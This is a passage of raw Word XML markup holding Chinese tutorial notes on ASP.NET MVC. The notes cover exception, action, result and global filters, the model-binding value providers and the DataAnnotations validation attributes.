          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>运用内建的异常过滤器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[HandleError(ExceptionType = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ArgumentException),View = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>"ErrorPage"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>)]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Delete()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>throw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ArgumentException(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>"参数名不正确"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>这样一旦在方法中出现了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ArgumentException</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>，就会跳转到</w:t>
      </w:r>
      <w:r>
        <w:t>ErrorPage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>动作过滤器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>动作过滤器是可以被用作任何目的的多用途过滤器。创建这种过滤器需要实现IActionFilter接口。该接口定义了两个方法：OnActionExecuting()和OnActionExecuted()。前者会在动作方法之前执行，后者会在动作方法之后执行。</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FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>public</w:t>
      </w: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class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CustomActionAttribute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> : FilterAttribute, IActionFilter</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&lt;summary&gt;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在动作方法之后执行</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&lt;/summary&gt;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&lt;param name="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>filterContext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&gt;&lt;/param&gt;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public</w:t>
      </w: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void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> OnActionExecuted(ActionExecutedContext filterContext)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8000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//throw new NotImplementedException();</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autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pP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&lt;summary&gt;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在动作方法之前执行</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&lt;/summary&gt;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&lt;param name="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>filterContext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&gt;&lt;/param&gt;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public</w:t>
      </w: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void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> OnActionExecuting(ActionExecutingContext filterContext)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var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> ActionName = filterContext.ActionDescriptor.ActionName;</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var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> ControllerName = filterContext.ActionDescriptor.ControllerDescriptor.ControllerName;</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filterContext.Result = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> HttpNotFoundResult();    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="008000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>//方法结果返回404页面</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pStyle w:val="37"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实现自定义的动作过滤器，还需要实现FilterAttribute接口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在OnActionExecuting方法的参数中有个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性，你可以通过它来控制返回的结果。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>结果过滤器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结果过滤器是多用途过滤器，它会对动作方法产生的结果进行操作。结果过滤器实现IFilterResult接口。继承该接口需要实现OnResultExecuting和OnResultExecuted方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OnResultExecuting方法是在“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>指明意图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”之后“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>执行意图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”之前执行。OnResultExecuted方法是在“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>执行意图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”之后执行。(指明意图和执行意图可以参考上面的“理解动作方法”一节)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="46"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>全局过滤器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>全局作用域会被运用于所有动作方法，设置它有一定的约定，我们首先在App_start添加FilterConfig.cs文件，写入以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>namespace</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Filte</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>rs</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public</w:t>
      </w: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class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="2B91AF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>FilterConfig</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&lt;summary&gt;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全局过滤器</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&lt;/summary&gt;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&lt;param name="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&gt;&lt;/param&gt;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public</w:t>
      </w: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static</w:t>
      </w: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void</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> RegisterGlobalFilter(GlobalFilterCollection filter)</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filter.Add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> HandleErrorAttribute());</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filter.Add(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="0000FF"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> CustomActionAttribute());</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pStyle w:val="37"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后我们在</w:t>
      </w:r>
      <w:r>
        <w:t>Global.asax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Application_Start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()添加以下内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>FilterConfig.RegisterGlobalFilter(GlobalFilters.Filters);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:rPr>
          <w:b/>
          <w:color w:val="02696D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="02696D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Binding模型绑定</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>new ChildActionValueProviderFactory(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>new FormValueProviderFactory(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>new JsonValueProviderFactory(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>new RouteDataValueProviderFactory(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>new QueryStringValueProviderFactory(),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>new HttpFileCollectionValueProviderFactory()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="450"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="02696D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:b/>
          <w:color w:val="02696D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AOP面向切面（常用特性(Attribute)及自定义特性）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>元数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="900"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>验证基类System.ComponentModel.DataAnnotations.ValidationAttribute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System.ComponentModel.DataAnnotations.CompareAttribute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System.ComponentModel.DataAnnotations.CustomValidationAttribute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System.ComponentModel.DataAnnotations.DataTypeAttribute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System.ComponentModel.DataAnnotations.MaxLengthAttribute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System.ComponentModel.DataAnnotations.MinLengthAttribute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System.ComponentModel.DataAnnotations.RangeAttribute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System.ComponentModel.DataAnnotations.RegularExpressionAttribute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System.ComponentModel.DataAnnotations.RequiredAttribute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System.ComponentModel.DataAnnotations.StringLengthAttribute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System.Web.Security.MembershipPasswordAttribute</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
